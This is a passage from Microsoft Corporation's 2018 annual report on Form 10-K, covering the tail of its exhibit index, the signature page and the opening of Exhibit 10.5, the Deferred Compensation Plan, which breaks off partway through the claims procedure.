| 4.7 | Fourth Supplemental Indenture for 0.875% Notes due 2017, 2.125% Notes due 2022, and 3.500% Notes due 2042, dated as of November 7, 2012, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.1 | 11/7/12 |
| 4.8 | Fifth Supplemental Indenture for 2.625% Notes due 2033, dated as of May 2, 2013, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.1 | 5/1/13 |
| 4.9 | Sixth Supplemental Indenture for 1.000% Notes due 2018, 2.375% Notes due 2023, and 3.750% Notes due 2043, dated as of May 2, 2013, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.2 | 5/1/13 |

| Exhibit Number | Exhibit Description | Filed Herewith | Incorporated by Reference | | | |
|---|---|---|---|---|---|---|
| | | | Form | Period Ending | Exhibit | Filing Date |
| 4.10 | Seventh Supplemental Indenture for 2.125% Notes due 2021 and 3.125% Notes due 2028, dated as of December 6, 2013, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.1 | 12/6/13 |
| 4.11 | Eighth Supplemental Indenture for 1.625% Notes due 2018, 3.625% Notes due 2023, and 4.875% Notes due 2043, dated as of December 6, 2013, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.2 | 12/6/13 |
| 4.12 | Ninth Supplemental Indenture for 1.850% Notes due 2020, 2.375% Notes due 2022, 2.700% Notes due 2025, 3.500% Notes due 2035, 3.750% Notes due 2045, and 4.000% Notes due 2055, dated as of February 12, 2015, between Microsoft Corporation and U.S. Bank National Association, as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.1 | 2/12/15 |
| 4.13 | Tenth Supplemental Indenture for 1.300% Notes due 2018, 2.000% Notes due 2020, 2.650% Notes due 2022, 3.125% Notes due 2025, 4.200% Notes due 2035, 4.450% Notes due 2045, and 4.750% Notes due 2055, dated as of November 3, 2015, between Microsoft Corporation and U.S. Bank National Association, as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.1 | 11/3/15 |

| | | | Incorporated by Reference | | | |
|---|---|---|---|---|---|---|
| Exhibit Number | Exhibit Description | Filed Herewith | Form | Period Ending | Exhibit | Filing Date |
| 4.14 | Eleventh Supplemental Indenture for 1.100% Notes due 2019, 1.550% Notes due 2021, 2.000% Notes due 2023, 2.400% Notes due 2026, 3.450% Notes due 2036, 3.700% Notes due 2046, and 3.950% Notes due 2056, dated as of August 8, 2016, between Microsoft Corporation and U.S. Bank, National Association, as trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.1 | 8/5/16 |
| 4.15 | Twelfth Supplemental Indenture for 1.850% Notes due 2020, 2.400% Notes due 2022, 2.875% Notes due 2024, 3.300% Notes due 2027, 4.100% Notes due 2037, 4.250% Notes due 2047, and 4.500% Notes due 2057, dated as of February 6, 2017, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as trustee | | 8-K | | 4.1 | 2/3/17 |
| 10.1* | Microsoft Corporation 2001 Stock Plan | | 10-Q | 9/30/16 | 10.1 | 10/20/16 |
| 10.4* | Microsoft Corporation Employee Stock Purchase Plan | | 10-K | 6/30/12 | 10.4 | 7/26/12 |
| 10.5* | Microsoft Corporation Deferred Compensation Plan | X | | | | |
| 10.6* | Microsoft Corporation 2017 Stock Plan | | DEF14A | | Annex C | 10/16/17 |
| 10.7* | Form of Stock Award Agreement Under the Microsoft Corporation 2017 Stock Plan | | 10-Q | 3/31/2018 | 10.26 | 4/26/18 |
| 10.8* | Form of Performance Stock Award Agreement Under the Microsoft Corporation 2017 Stock Plan | | 10-Q | 3/31/2018 | 10.27 | 4/26/18 |
| 10.12 | Amended and Restated Officers' Indemnification Trust Agreement between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as trustee | | 10-Q | 9/30/16 | 10.12 | 10/20/16 |

| Exhibit Number | Exhibit Description | Filed Herewith | Incorporated by Reference | | | |
|---|---|---|---|---|---|---|
| | | | Form | Period Ending | Exhibit | Filing Date |
| 10.13 | Amended and Restated Directors' Indemnification Trust Agreement between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as trustee | | 10-Q | 9/30/16 | 10.13 | 10/20/16 |
| 10.14* | Microsoft Corporation Deferred Compensation Plan for Non-Employee Directors | | 10-Q | 12/31/17 | 10.14 | 1/31/18 |
| 10.17* | Executive Officer Incentive Plan | | 10-Q | 9/30/15 | 10.17 | 10/22/15 |
| 10.18* | Form of Executive Officer Incentive Plan Stock Award Agreement under the Microsoft Corporation 2001 Stock Plan | | 10-Q | 9/30/15 | 10.18 | 10/22/15 |
| 10.19* | Microsoft Corporation Executive Incentive Plan | | 10-Q | 9/30/16 | 10.17 | 10/20/16 |
| 10.20* | Form of Executive Incentive Plan (Executive Officer SAs) Stock Award Agreement under the Microsoft Corporation 2001 Stock Plan | | 10-Q | 9/30/16 | 10.18 | 10/20/16 |
| 10.21* | Form of Executive Incentive Plan Performance Stock Award Agreement under the Microsoft Corporation 2001 Stock Plan | | 10-Q | 9/30/16 | 10.25 | 10/20/16 |
| 10.22* | Senior Executive Severance Benefit Plan | | 10-Q | 9/30/16 | 10.22 | 10/20/16 |
| 10.23* | Offer Letter, dated February 3, 2014, between Microsoft Corporation and Satya Nadella | | 8-K | | 10.1 | 2/4/14 |
| 10.24* | Long-Term Performance Stock Award Agreement between Microsoft Corporation and Satya Nadella | | 10-Q | 12/31/14 | 10.24 | 1/26/15 |
| 10.25* | Form of Executive Officer Incentive Plan Performance Stock Award Agreement under the Microsoft Corporation 2001 Stock Plan | | 10-Q | 9/30/15 | 10.25 | 10/22/15 |
| 12 | Computation of Ratios of Earnings to Fixed Charges | X | | | | |
| 21 | Subsidiaries of Registrant | X | | | | |
| 23.1 | Consent of Independent Registered Public Accounting Firm | X | | | | |
| 31.1 | Certifications of Chief Executive Officer Pursuant to Section 302 of the Sarbanes-Oxley Act of 2002 | X | | | | |

| Exhibit Number | Exhibit Description | Filed Herewith | Incorporated by Reference | | | |
|---|---|---|---|---|---|---|
| | | | Form | Period Ending | Exhibit | Filing Date |
| 31.2 | Certifications of Chief Financial Officer Pursuant to Section 302 of the Sarbanes-Oxley Act of 2002 | X | | | | |
| 32.1** | Certifications of Chief Executive Officer Pursuant to Section 906 of the Sarbanes-Oxley Act of 2002 | X | | | | |
| 32.2** | Certifications of Chief Financial Officer Pursuant to Section 906 of the Sarbanes-Oxley Act of 2002 | X | | | | |
| 101.INS | XBRL Instance Document | X | | | | |
| 101.SCH | XBRL Taxonomy Extension Schema | X | | | | |
| 101.CAL | XBRL Taxonomy Extension Calculation Linkbase | X | | | | |
| 101.DEF | XBRL Taxonomy Extension Definition Linkbase | X | | | | |
| 101.LAB | XBRL Taxonomy Extension Label Linkbase | X | | | | |
| 101.PRE | XBRL Taxonomy Extension Presentation Linkbase | X | | | | |

\*    *Indicates a management contract or compensatory plan or arrangement*
\*\*   *Furnished, not filed*

## ITEM 16. FORM 10-K SUMMARY

None.

**SIGNATURES**

Pursuant to the requirements of Section 13 or 15(d) of the Securities Exchange Act of 1934, the Registrant has duly caused this report to be signed on its behalf by the undersigned; thereunto duly authorized, in the City of Redmond, State of Washington, on August 3, 2018.

MICROSOFT CORPORATION

/s/   FRANK H. BROD
_____
Frank H. Brod
Corporate Vice President, Finance and Administration;
Chief Accounting Officer (Principal Accounting Officer)

Pursuant to the requirements of the Securities Exchange Act of 1934, this report has been signed below by the following persons on behalf of Registrant and in the capacities indicated on August 3, 2018.

| Signature | Title |
|---|---|
| /s/   JOHN W. THOMPSON | Chairman |
| John W. Thompson | |
| /s/   SATYA NADELLA | Director and Chief Executive Officer |
| Satya Nadella | |
| /s/   WILLIAM H. GATES III | Director |
| William H. Gates III | |
| /s/   REID HOFFMAN | Director |
| Reid Hoffman | |
| /s/   HUGH F. JOHNSTON | Director |
| Hugh F. Johnston | |
| /s/   TERI L. LIST-STOLL | Director |
| Teri L. List-Stoll | |
| /s/   CHARLES H. NOSKI | Director |
| Charles H. Noski | |
| /s/   HELMUT PANKE | Director |
| Helmut Panke | |
| /s/   SANDRA E. PETERSON | Director |
| Sandra E. Peterson | |
| /s/   PENNY S. PRITZKER | Director |
| Penny S. Pritzker | |
| /s/   CHARLES W. SCHARF | Director |
| Charles W. Scharf | |
| /s/   ARNE M. SORENSON | Director |
| Arne M. Sorenson | |
| /s/   JOHN W. STANTON | Director |
| John W. Stanton | |
| /s/   PADMASREE WARRIOR | Director |
| Padmasree Warrior | |
| /s/   AMY E. HOOD | Executive Vice President and Chief Financial Officer (Principal Financial Officer) |
| Amy E. Hood | |
| /s/   FRANK H. BROD | Corporate Vice President, Finance and Administration; Chief Accounting Officer (Principal Accounting Officer) |
| Frank H. Brod | |

Exhibit 10.5

**MICROSOFT CORPORATION**
**DEFERRED COMPENSATION PLAN**
**(Restated Effective as of May 15, 2015)**

1.      Purpose.

        The purpose of the Microsoft Corporation Deferred Compensation Plan (the "Plan") is to further the long-term growth of Microsoft Corporation (the "Company") by allowing selected Company executives and other senior management or highly compensated employees to defer receipt of certain compensation in order to keep their financial interests aligned with the Company and provide them with a long-term incentive to continue employment with the Company.

        The Plan was formerly known as the 1998 Microsoft Corporation Stock Option Gain and Bonus Deferral Program.  The name of the Plan was changed pursuant to a restatement effective January 1, 2006.

        This Plan is intended (1) to comply with section 409A of the Internal Revenue Code, as amended (the "Code") and official guidance issued thereunder (except with respect to amounts covered by Appendix B), and (2) to be "a plan which is unfunded and is maintained by an employer primarily for the purpose of providing deferred compensation for a select group of management or highly compensated employees" within the meaning of sections 201(2), 301(a)(3) and 401(a)(1) of the Employee Retirement Income Security Act of 1974.  Notwithstanding any other provision of this Plan, this Plan shall be interpreted, operated and administered in a manner consistent with these intentions.

2.      Effective Date.

        The Plan was originally effective November 18, 1998.  Except as specifically set forth below, this restatement of the Plan is effective as of May 15, 2015.

3.      Definitions.

        Account – means a bookkeeping account established by the Company for each Participant electing to defer Eligible Income under the Plan, which may include sub-accounts for different types of Eligible Income deferred and for amounts payable at different times and/or payable in different forms.

        Acquisition Retention Bonus – means a bonus provided to a Newly Hired Eligible Employee who continues employment with the Company or a Designated Subsidiary after the acquisition of a business by the Company or a Designated Subsidiary or who begins employment with the Company or a Designated Subsidiary as part of a strategic alliance.

        Acquisition Signing Bonus – means a bonus provided to a Newly Hired Eligible Employee upon acceptance of an offer to continue employment with the Company or a Designated Subsidiary after the acquisition of a business by the Company or a Designated Subsidiary or to begin employment with the Company or Designated Subsidiary as part of a strategic alliance.

        Affiliate – means any corporation or other entity that is treated as a single employer with the Company under Code section 414.

        Annual Base Salary – means the regular annual base salary paid to an Eligible Employee.

        Annual Bonus – means the amount payable to an Eligible Employee as an annual bonus that is awarded in connection with the Company's annual process under the Annual Bonus Plan or the cash portion of awards under the Executive Incentive Plan.

        Board – means the Board of Directors of Microsoft Corporation.

        Code – means the Internal Revenue Code of 1986, as amended.

<u>Company</u> – means Microsoft Corporation.

<u>Date of Hire</u> – means the date of a Participant's first day of active employment with the Company and its Affiliates.

<u>Designated Subsidiary</u> – means a subsidiary of the Company that has been approved for participation in the Plan by the Senior HR Officer.  A listing of the Designated Subsidiaries is in Appendix A.

<u>Disabled</u> – means:

(a)      A Participant (1) is unable to engage in any substantial gainful activity by reason of any medically determinable physical or mental impairment which can be expected to result in death or can be expected to last for a continuous period of not less than 12 months, or (2) is, by reason of any medically determinable physical or mental impairment which can be expected to result in death or can be expected to last for a continuous period of not less than 12 months, receiving income replacement benefits for a period of not less than 3 months under an accident and health plan covering employees of the participant's employer.

(b)      The Plan Administrator, in its complete and sole discretion, shall determine whether a Participant is Disabled.  The Plan Administrator may require that the Participant submit to an examination on an annual basis, at the expense of the Company, by a competent physician or medical clinic selected by the Plan Administrator to assist in determining whether the Participant is Disabled.  On the basis of such medical evidence, the determination of the Plan Administrator as to whether or not the Participant is Disabled (or whether he continues to be Disabled) shall be conclusive.

<u>Eligible Employee</u> – means:

(a)      An Employee of the Company or a Designated Subsidiary working in the U.S. at the Company's stock level 68 or above and, effective with respect to Eligible Income earned for periods beginning on or after January 1, 2012, an Employee of the Company or a Designated Subsidiary working in the U.S. at the Company's stock level 67 or above.

(b)      An Employee meeting the criteria of subsection (a) will not fail to be considered an Eligible Employee solely as a result of being on paid or unpaid leave.

<u>Eligible Income</u> – means compensation which may be deferred under the Plan, as from time to time determined by the Plan Administrator, including without limitation (1) Regular Enrollment Compensation and (2) New Hire Enrollment Compensation.  Amounts will qualify as "Eligible Income" only if the Participant is on the U.S. payroll of the Company or its Affiliates at the time the amount is payable to the Participant absent deferral.

<u>Employee</u> – means an individual who is a regular employee on the U.S. payroll of the Company or its Affiliates.  The term "Employee" shall not include a person hired as an independent contractor, leased employee, consultant, or a person otherwise designated by the Company or an Affiliate as not eligible to participate in the Plan, even if such person is determined to be a common law employee of the Company or an Affiliate by any governmental or judicial authority.

<u>ERISA</u> – means the Employee Retirement Income Security Act of 1974, as amended.

<u>Fiscal Year Compensation</u> – means "fiscal year compensation" as defined under Treas. Reg. § 1.409A-2(a)(6) or any successor thereto.

<u>Hire Date</u> – means the date an Employee becomes employed by the Company or a Designated Subsidiary. In the case of an individual who becomes an Employee upon the acquisition of a business by the Company or a Designated Subsidiary, the Employee's "Hire Date" shall be his transfer date.

<u>Investment Options</u> – means a set of investment options, which may include investment options offered under the 401(k) Plan, and which are from time to time determined by the Plan Administrator and used to credit earnings, gains, and losses on Account balances.

Key Employee – means an employee treated as a "specified employee" under Code section 409A(a)(2)(B)(i) as of his Separation from Service (i.e., a key employee (as defined under Code section 416(i) without regard to paragraph (5) thereof) of a corporation any stock of which is publicly traded on an established securities market or otherwise). Key Employees shall be determined in accordance with Code section 409A, using a December 31 identification date. A listing of Key Employees as of an identification date shall be effective for the 12-month period beginning on the April 1 following the identification date.

New Hire Enrollment Compensation – means compensation for a Newly Hired Eligible Employee which is from time to time determined by the Plan Administrator, including without limitation a (1) New Hire Signing Bonus, (2) Acquisition Retention Bonus, and (3) Acquisition Signing Bonus.

New Hire Signing Bonus – means a bonus provided to a Newly Hired Eligible Employee upon acceptance of an offer of employment with the Company or a Designated Subsidiary.

Newly Hired Eligible Employee – means an individual hired by the Company or a Designated Subsidiary who meets the criteria for an Eligible Employee on his Hire Date, provided that an individual who has previously worked for the Company or an Affiliate will only qualify as a "Newly Hired Eligible Employee" if he meets the requirements of Treas. Reg. § 1.409A-2(a)(7) or any successor thereto. Generally, a re-hired individual will meet these requirements if (1) he has been paid any and all amounts due him under the Plan (and any plans required to be aggregated with the Plan under Code section 409A) prior to re-hire, or (2) he has not been eligible to participate, other than the accrual of earnings, in the Plan (or any other plan required to be aggregated with the Plan under Code section 409A) for at least 24 months.

Open Enrollment – means the period or periods during each Plan Year when Eligible Employees may elect to defer amounts under the Plan. Open Enrollment shall be held at the time or times designated by the Plan Administrator.

Participant – means an Eligible Employee who elects to defer Eligible Income under the Plan.

Performance-Based Compensation – means "performance-based compensation" as defined under Code section 409A.

Plan – means the Microsoft Corporation Deferred Compensation Plan, as amended from time to time.

Plan Administrator – means the Senior HR Officer or, with respect to the eligibility of executive officers of the Company to participate in the Plan, the Compensation Committee of the Board.

Plan Year – means the 12-month period from January 1 to December 31.

Pre-2014 Election Amount – means an amount deferred under the Plan (and earnings thereon) pursuant to a deferral election that (1) becomes irrevocable during an Open Enrollment period occurring before July 1, 2013, or (2) is made by a Newly Hired Eligible Employee under Section 5.1(b)(ii) and becomes irrevocable on or before December 31, 2013. Thus, Annual Base Salary amounts deferred after 2013 and Annual Bonuses deferred based on elections made after 2013 will not be considered Pre-2014 Election Amounts.

Regular Enrollment Compensation – means compensation which is from time to time determined by the Plan Administrator, including without limitation (1) Annual Base Salary, and (2) Annual Bonus.

Retirement – means a Separation from Service after attaining Retirement Age.

Retirement Age – means one specified date for each Participant occurring on the earlier of: (1) Participant's attainment of age sixty-five (65), or (2) the later of Participant's attainment of age fifty-five (55) or the tenth (10th) anniversary of his Date of Hire. When an Employee becomes eligible to participate in the Plan, the Plan Administrator shall determine the Retirement Age for the Employee as one specified date in accordance with the foregoing.

Senior HR Officer – means the senior officer in charge of the Human Resources department.

Separation from Service or Separates from Service – means a "separation from service" with the Company and its Affiliates within the meaning of Code section 409A.

401(k) Plan – means the Microsoft Corporation Savings Plus 401(k) Plan.

4.   Participation.

    4.1    An Eligible Employee becomes an active Participant in the Plan on the date he first enrolls in the Plan by electing to defer all or any portion of his Eligible Income.  An Eligible Employee may enroll in the Plan during Open Enrollment in accordance with Section 5.1(b)(i) or pursuant to Section 5.1(c).  A Newly Hired Eligible Employee may enroll before his Hire Date in accordance with 5.1(b)(ii).

    4.2    An Eligible Employee who has been an active Participant under the Plan will cease to be a Participant on the date his Account is fully distributed.

5.   Participant Accounts.

    5.1    Elections to Defer Eligible Income.

        (a)    Initial Deferral Election.  An Eligible Employee may make an irrevocable election to defer the following types of Eligible Income in one (1) percent increments up to the specified maximum percentages:

            (i)    An Eligible Employee may elect to defer up to 75% of his Annual Base Salary.

            (ii)    An Eligible Employee may elect to defer up to 100% of a Annual Bonus.

            (iii)    An Eligible Employee may elect to defer up to 90% of New Hire Enrollment Compensation.

Eligible Employees are not permitted to defer gains on the exercise of a stock option under the Plan after December 31, 2004.

        (b)    Time and Manner of Making an Initial Election.

            (i)    An Eligible Employee may make an election to defer one or more types of Regular Enrollment Compensation during an Open Enrollment period that occurs in the Plan Year preceding the Plan Year in which the Regular Enrollment Compensation begins to be earned.  A deferral election shall be made in accordance with procedures established by the Plan Administrator.  An Employee's election during such an Open Enrollment period will not be given effect if the Employee ceases to be an Eligible Employee by the last day of the month in which the Open Enrollment period occurs.

            (ii)    A Newly Hired Eligible Employee may make an election to defer one or more types of New Hire Enrollment Compensation in accordance with procedures established by the Plan Administrator, provided such election occurs before his Hire Date and such election shall only apply to amounts earned after the election is filed.  A Newly Hired Eligible Employee may make an election to defer Regular Enrollment Compensation during an Open Enrollment period that follows or coincides with his Hire Date.

        (c)    Alternative Election Deadlines.  Notwithstanding the rules in subsection (b), if the Plan Administrator, in its sole discretion, determines that:

            (i)    Eligible Income constitutes Performance-Based Compensation that is based on services performed over a performance period of at least twelve (12) months, the Plan Administrator may establish procedures, including an Open Enrollment period, under which an Eligible Employee may elect to defer such Performance-Based Compensation, but such election must be made no later than six (6) months before the end of the performance period; or

            (ii)    Eligible Income constitutes Fiscal Year Compensation, the Plan Administrator may establish procedures, including an Open Enrollment period, under which an Eligible Employee may elect to defer such Fiscal Year Compensation, but such election must be made no later than the last day of the Company's fiscal year immediately preceding the first fiscal year in which services are performed related to such Eligible Income.

An Employee's election under this Section will not be given effect if the Employee ceases to be an Eligible Employee by the deadline stated above for making such an election.

      (d)    <u>Cancellation of Election</u>.  If a Participant becomes Disabled, receives a hardship withdrawal under the 401(k) Plan, or obtains a distribution under Section 6.6 on account of an unforeseeable emergency during a Plan Year, his deferral election for such Plan Year shall be cancelled.

      5.2    <u>Crediting of Deferrals</u>.  Eligible Income deferred by a Participant under the Plan shall be credited to the Participant's Account as soon as practicable after the amounts would have otherwise been paid to the Participant.

      5.3    <u>Vesting</u>.  A Participant shall at all times be one-hundred (100) percent vested in any amounts credited to his Account.

      5.4    <u>Investments and Earnings</u>.  The Company shall periodically credit gains, losses and earnings to a Participant's Account, until the full balance of the Account has been distributed.  Amounts shall be credited to a Participant's Account under this Section based on the results that would have been achieved had amounts credited to the Account been invested as soon as practicable after crediting into the Investment Options selected by the Participant.  The Plan Administrator shall specify procedures to allow Participants to make elections as to the deemed investment of amounts newly credited to their Accounts, as well as the deemed investment of amounts previously credited to their Accounts.  Nothing in this Section or otherwise in the Plan, however, will require the Company to actually invest any amounts in such Investment Options or otherwise.

      5.5    <u>Employment Taxes</u>.  The Participant's share of FICA and FUTA taxes owed on Eligible Income the Participant elects to defer shall be deducted from other compensation payable to the Participant.

6.    <u>Distribution of Account Balances</u>.

      6.1    <u>Distribution Form</u>.

      (a)    A Participant may elect to have amounts deferred under the Plan (and earnings thereon) distributed in a lump sum payment or in annual installments over a period ranging from three (3) to fifteen (15) years.

      (b)    A Participant must specify the form in which a deferred amount (and earnings thereon) will be distributed at the time of making the initial deferral election under Section 5.1.

      (c)    Notwithstanding the distribution form elected under subsection (a), if at the time a portion of a Participant's Account is to be distributed, the portion of the balance to be distributed is less than $50,000, that portion shall be distributed in a lump sum payment at such time, provided that this subsection (c) shall not apply to any amounts deferred under the Plan pursuant to a deferral election that becomes irrevocable on or after June 30, 2011 (and earnings thereon).

      (d)    Distribution of a Participant's Account balance shall be made in cash.

      6.2    <u>Distribution Time</u>.  <u>The rules in this Section 6.2 shall apply to amounts deferred under the Plan, excluding any portion of a Participant's Account attributable to Pre-2014 Election Amounts.</u>

      (a)    A Participant may elect to have distribution of a deferred amount (and earnings thereon) commence as of the following dates:

            (i)    A specified time (a particular month and year); or

            (ii)    Upon the Participant's <u>Separation from Service (in which case distributions will commence in the month following Separation from Service)</u>.

      (b)    A Participant must specify their distribution commencement election at the time of making the initial deferral election under Section 5.1.

(c)     If a Participant elects to have a deferred amount distributed as of a specified time, the specified time must be at least twelve (12) months after the date on which the final payment of the deferred amount would have been made to the Participant absent deferral.

6.3     Distribution of Pre-2014 Election Amounts Upon Separation from Service.  The rules in this Section 6.3 shall only apply to Pre-2014 Election Amounts.

(a)     If a Participant reaches Retirement Age prior to having a Separation from Service, the distribution of a Pre-2014 Election Amount will commence as follows:

(i)     If the Participant elected commencement upon Retirement, the distribution will commence in the month following Retirement.

(ii)     If the Participant elected commencement upon a specified time, the distribution will commence in the specified month and year.

(b)     Notwithstanding a Participant's elections with respect to Pre-2014 Election Amounts, (i) if a Participant Separates from Service prior to reaching Retirement Age, the portion of his Account balance attributable to Pre-2014 Election Amounts shall be distributed in an immediate lump sum payment in the month following the Separation from Service, and (ii) if a Participant becomes Disabled prior to attaining Retirement Age while employed with the Company or an Affiliate, the portion of his Account balance attributable to Pre-2014 Election Amounts shall be distributed in an immediate lump sum payment in the month following the date the Participant becomes Disabled.

6.4     Key Employee Delay.  Except as otherwise permitted under IRS guidance, if  a distribution is to be made upon the Separation from Service of a Key Employee, distribution may not be made before the date which is six months after the date of the Key Employee's Separation from Service (or, if earlier, the date of death of the Key Employee).  Any payments that would otherwise be made during this period of delay shall be paid in accordance with the elected distribution method and the terms of the Plan in the seventh month following Separation from Service (or, if earlier, following the Key Employee's death in accordance with Sections 6.5(a) and (b) below).

6.5     Distributions Upon Death.

(a)     Notwithstanding a Participant's elections with respect to Pre-2014 Election Amounts, if a Participant dies prior to attaining Retirement Age while employed with the Company or an Affiliate, the portion of his Account balance attributable to the Pre-2014 Election Amounts shall be distributed to the Participant's beneficiary in an immediate single lump sum payment in the month following the date of the Participant's death.

(b)     Notwithstanding a Participant's elections under Sections 6.1 and 6.2, if a Participant dies, his Account balance, excluding any portion attributable to Pre-2014 Election Amounts, shall be distributed to the Participant's beneficiary in a single lump sum payment on the date six months after the date of the Participant's death.

(c)     A Participant shall designate his beneficiary prior to death in accordance with procedures established by the Plan Administrator.  If a Participant has not properly designated a beneficiary or if no designated beneficiary is living on the date of distribution, such amount shall be distributed to the Participant's beneficiary designated under the 401(k) Plan, or if no designated beneficiary under the 401(k) Plan is living, in accordance with the default provisions under the 401(k) Plan.

(d)     For purposes of determining the proper death beneficiary under this Plan, this Plan shall not be interpreted as preempting applicable state law regarding the ownership rights of Accounts upon a Participant's death.  For example, although this Plan states that upon a Participant's death, Account balances will be paid to his beneficiary, the personal representative will be obligated to pay any benefits owed to a spouse or otherwise as a result of any applicable community property laws.

6.6     Withdrawals for Unforeseeable Emergency.  A Participant may withdraw all or any portion of his Account balance for an Unforeseeable Emergency.  The amounts distributed with respect to an Unforeseeable Emergency may not exceed the amounts necessary to satisfy such Unforeseeable Emergency plus amounts necessary to pay taxes reasonably anticipated as a result of the distribution, after taking into account the extent to which such hardship is or may be relieved through reimbursement or compensation by insurance or otherwise or by liquidation of the Participant's assets (to the extent the liquidation of such assets would not itself cause severe

financial hardship) or by cessation of deferrals under the Plan. "Unforeseeable Emergency" means for this purpose a severe financial hardship to a Participant resulting from an illness or accident of the Participant, the Participant's spouse, or a dependent of the Participant, loss of the Participant's property due to casualty, or other similar extraordinary and unforeseeable circumstances arising as a result of events beyond the control of the Participant.

Except as otherwise permitted under IRS guidance, a Participant shall be required to take any available hardship withdrawals from the 401(k) Plan before being eligible to receive a withdrawal under this section.

6.7  <u>Changes in Time or Form of Distribution</u>.  <u>To the extent permitted in accordance with procedures established by the Plan Administrator, a Participant</u> may make one or more subsequent elections to change the time or form of a distribution to be made as of a specified time or upon the occurrence of a distributable event for a deferred amount, but such an election will be effective only if the following conditions are satisfied:

(a)  The election may not take effect until at least twelve (12) months after the date on which the election is made;

(b)  A distribution may not be made earlier than at least five (5) years from the date the distribution would have otherwise been made;

(c)  In the case of an election to change the time or form of a distribution payable as of a specified time, the election must be made at least twelve (12) months before the date of the first scheduled distribution; and

(d)  The election may not result in an impermissible acceleration of payment prohibited under Code section 409A.

6.8  <u>Effect of Taxation</u>.  If a portion of the Participant's Account balance is includible in income under Code section 409A, such portion shall be distributed immediately to the Participant.

6.9  <u>Payment of Taxes</u>.  If state, local, or foreign tax obligations arise from participation in the Plan that apply to an amount deferred under the Plan before such amount is paid or made available to the Participant (the "Taxes"), the Company shall pay a portion of such deferred amount by distribution (a) to the Participant in the form of withholding pursuant to provisions of applicable state, local, or foreign law; or (b) directly to the Participant.  In no event shall the total payment under this Section 6.9 exceed the aggregate amount of the Taxes, and the income tax withholding related to such Taxes.

6.10  <u>Settlement of Bona Fide Dispute</u>.  Subject to certain presumptions under Code section 409A, if an arm's length, bona fide dispute between a Participant and the Company arises as to the Participant's right to an amount deferred under the Plan, the payment of the deferred amount as part of a settlement of such dispute shall be distributed immediately to the Participant.

6.11  <u>Offset for Obligations to Company</u>.  If the Participant has any debt, obligation or other liability representing an amount owing to the Company (the "Debt"), incurred in the ordinary course of his employment relationship, the Company shall offset the Debt against the Participant's Account balance.  The Company shall reduce the Participant's Account balance in satisfaction of the Debt at the same time and in the same amount as the Debt otherwise would have been due and collected from the Participant; provided however, in no event shall the amount of such offset in any of the Company's taxable years exceed $5,000.

6.12  <u>2005 Deferred Compensation</u>.  Except as provided in Appendix C, Sections 6.1-6.11 shall govern the distribution of compensation earned and deferred under the Plan during the 2005 Plan Year.

6.13  <u>Pre-2005 Deferrals</u>.  Notwithstanding the foregoing, Appendix B governs the distribution of amounts that were earned and vested (within the meaning of Code section 409A and regulations thereunder) under the Plan prior to 2005 (and earnings thereon) and are exempt from the requirements of Code section 409A.

7.  <u>Administration</u>.

7.1  <u>General Administration</u>.  The Plan Administrator shall be responsible for the operation and administration of the Plan and for carrying out the provisions hereof.  The Plan Administrator shall have the full authority and discretion to make, amend, interpret, and enforce all appropriate rules and regulations for the

administration of this Plan and decide or resolve any and all questions, including interpretations of this Plan, as may arise in connection with this Plan.  Except as otherwise provided in Section 7.2, any such action taken by the Plan Administrator shall be final and conclusive on any party.  To the extent the Plan Administrator has been granted discretionary authority under the Plan, the Plan Administrator's prior exercise of such authority shall not obligate it to exercise its authority in a like fashion thereafter.  The Plan Administrator shall be entitled to rely conclusively upon all tables, valuations, certificates, opinions and reports furnished by any actuary, accountant, controller, counsel or other person employed or engaged by the Company with respect to the Plan.  The Plan Administrator may, from time to time, employ agents and delegate to such agents, including other employees of the Company, such administrative duties as it sees fit.

> 7.2    Claims for Benefits.

> (a)    Filing a Claim.  A Participant or his authorized representative may file a claim for benefits under the Plan.  Any claim must be in writing and submitted to the Senior HR Officer at such address as may be specified from time to time.  Claimants will be notified in writing of approved claims, which will be processed as claimed.  A claim is considered approved only if its approval is communicated in writing to a claimant.

> (b)    Denial of Claim.  In the case of the denial of a claim respecting benefits paid or payable with respect to a Participant, a written notice will be furnished to the claimant within 90 days of the date on which the claim is received by the Senior HR Officer.  If special circumstances (such as for a hearing) require a longer period, the claimant will be notified in writing, prior to the expiration of the 90-day period, of the reasons for an extension of time; provided, however, that no extensions will be permitted beyond 90 days after the expiration of the initial 90-day period.

> (c)    Reasons for Denial.  A denial or partial denial of a claim will be dated and signed by the Senior HR Officer and will clearly set forth:

>> (i)    the specific reason or reasons for the denial;

>> (ii)    specific reference to pertinent Plan provisions on which the denial is based;

>> (iii)    a description of any additional material or information necessary for the claimant to perfect the claim and an explanation of why such material or information is necessary; and

>> (iv)    an explanation of the procedure for review of the denied or partially denied claim set forth below, including the claimant's right to bring a civil action under ERISA section 502(a) following an adverse benefit determination on review.

